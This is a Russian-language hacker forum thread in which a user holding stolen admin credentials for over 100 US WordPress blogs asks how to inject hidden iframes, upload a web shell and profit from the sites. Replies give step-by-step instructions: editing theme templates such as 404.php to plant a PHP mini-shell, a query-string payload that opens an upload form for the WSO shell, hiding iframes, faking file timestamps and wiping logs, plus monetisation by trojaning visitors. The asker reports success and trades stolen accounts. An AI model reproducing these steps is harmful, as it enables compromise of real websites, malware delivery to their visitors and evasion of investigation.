|
Есть более 100 блогов на водрпрес.Полный доступ к админкам(логин/пас).Блоги USA.
Вопрос. 1.Как проифреймить?Прокатит ли редактирование темы и вставка ифрейм кода? 2.Возможно ли залить шелл? 3.Что вобще можна выжать в материальном плане? За дельный ответ отдам пару админок с PR. Заранее благодарен. |
Цитата:
Сообщение от comynicator 1.Как проифреймить?Прокатит ли редактирование темы и вставка ифрейм кода? iFrame вставляется =) Вставляется куда-нибудь подальше, но что подключается везде =) Цитата: Сообщение от comynicator 2.Возможно ли залить шелл? Доступ к админке есть - вперёд! Лей, только не забудь попрятать его, изменять touch time, затирать логи и прочее. Цитата: Сообщение от comynicator 3.Что вобще можна выжать в материальном плане? Троянить, партнёрка, тизер (палевно, но возможно), трафик... =) |
Цитата:
Сообщение от comynicator Есть более 100 блогов на водрпрес.Полный доступ к админкам(логин/пас).Блоги USA. Вопрос. 1.Как проифреймить?Прокатит ли редактирование темы и вставка ифрейм кода? 2.Возможно ли залить шелл? 3.Что вобще можна выжать в материальном плане? За дельный ответ отдам пару админок с PR. Заранее благодарен. 1) Да, ты сможешь вставить свой фрейм через шаблоны. Если код фрейма не появится на странице - может быть несколько проблем: а) Страницы кешируются, для этого найди папку с кэшем и удали её. б) Ты вставил код не в тот шаблон. в) Файл шаблона не может быть отредактирован, так-как защищен от записи. Примечание: я не рекомендую его использовать, так-как гугл и яндекс плохо реагируют на это, а так же, некоторые антивирусы могут тоже ругаться на него. 2) Да, залить шелл вполне возможно. Для этого перейди в режим редактирования шаблона, выбери любой файл шаблона, к примеру 404.php и вставь в начало кода такую строчку: code: Далее зайди на главную страницу сайта, посмотри исходный код страницы, в самом верху ты сможешь найти пути к файлам-стилей, скопируй путь, убери в конце лишнее, чтобы был путь в корень каталога шаблона, добавь там имя файла, который ты редактировал, в нашем случае это 404.php , дальше добавь к адресу такую строку: code: ?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t= Все, теперь на странице появится форма загрузки, через которую ты сможешь залить полноценный шелл, к примеру: WSO 2.5 3) Если на сайте хорошие показатели Тиц и ПР - можно выжать деньги, рекомендую использовать сайты с тиц не меньше чем 100 и пр не меньше чем 1, желательно, чтобы пр был 3 и больше, но все же. Так же рекомендовано, чтобы сайт был в яндекс каталоге и DMOZ, а так же имел более 100 проиндексированных страниц в яндексе, все эти параметры повышают число $$$, которые ты с них выжмешь. Так же можно сливать трафик с гугла и яндекса или же с других поисковых системах. Если понадобится код - могу написать под твои потребности, да и много кода там не понадобится. Если что-то не понятно или требуется помощь - пиши, буду рад помочь. ------------------------------------------------------------------------------------------------------ UpDate: Цитата: Сообщение от _Werewolf_ iFrame вставляется =) Немного добавлю от себя, если все же нужно вставить фрейм - лучше его ещё запихнуть под невидимый блок: Так-как на странице он будет отображаться как небольшой квадратик. |
Далее зайди на главную страницу сайта, посмотри исходный код страницы, в самом верху ты сможешь найти пути к файлам-стилей, скопируй путь, убери в конце лишнее, чтобы был путь в корень каталога шаблона, добавь там имя файла, который ты редактировал, в нашем случае это 404.php , дальше добавь к адресу такую строку:
code: ?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t= Все, теперь на странице появится форма загрузки, через которую ты сможешь залить полноценный шелл, к примеру: WSO 2.5 А можно ли подробнее вот на даном примере? Допустим куда именно вставить минишелл? Công Ty Nhà Đẹp В даной теме я полный нуб.Если возможно покажите на даном примере что именно менять? |
К примеру вот так
code: Công Ty Nhà Đẹp |
Прям интересно стало - зачем залить eval() и через него извращаться с формой?
Ладно, частью согласен - удалит шелл админ, а ты новый грузанёшь =) Но: он же и код найдёт и/или права выставит правильные. Тем более нужно создавать не cmd, а сложночитаемую хрень, а то запалишься =) Да и запросы в логах есть - чувака с наличием хотя бы костного мозга должно настрожить то, что к такому файлу идут такие GET-переменные. Плюс ко всему с таким палевным именем. |
Цитата:
Сообщение от _Werewolf_ Прям интересно стало - зачем залить eval() и через него извращаться с формой? Ладно, частью согласен - удалит шелл админ, а ты новый грузанёшь =) Но: он же и код найдёт и/или права выставит правильные. Тем более нужно создавать не cmd, а сложночитаемую хрень, а то запалишься =) Да и запросы в логах есть - чувака с наличием хотя бы костного мозга должно настрожить то, что к такому файлу идут такие GET-переменные. Плюс ко всему с таким палевным именем. Цель была залить шелл, а не спрятать его -) |
И все же какой именно из stylesheet заменить на то что вы указали?И как это должно выглядеть?Могу дать админку с даного примера.
|
Цитата:
Сообщение от comynicator И все же какой именно из stylesheet заменить на то что вы указали?И как это должно выглядеть?Могу дать админку с даного примера. Вставлять код мини-шелла нужно в любом файле с расширением *.php IMAGE http://mflood.co.ua/images/uploads/2014-01-19_230427_838.png |
Спасибо огромное всем кто ответил и разжевал.Отдельно ZoRKeG
Наконец то появилась форма загрузки Минишелл залил в 404.php В форму для загрузки залил wso. А вот как найти путь к шелу(WSO)?Так понимаю где то в уплоад? Если нада еще админки-поделюсь. |
| Время: 08:02 |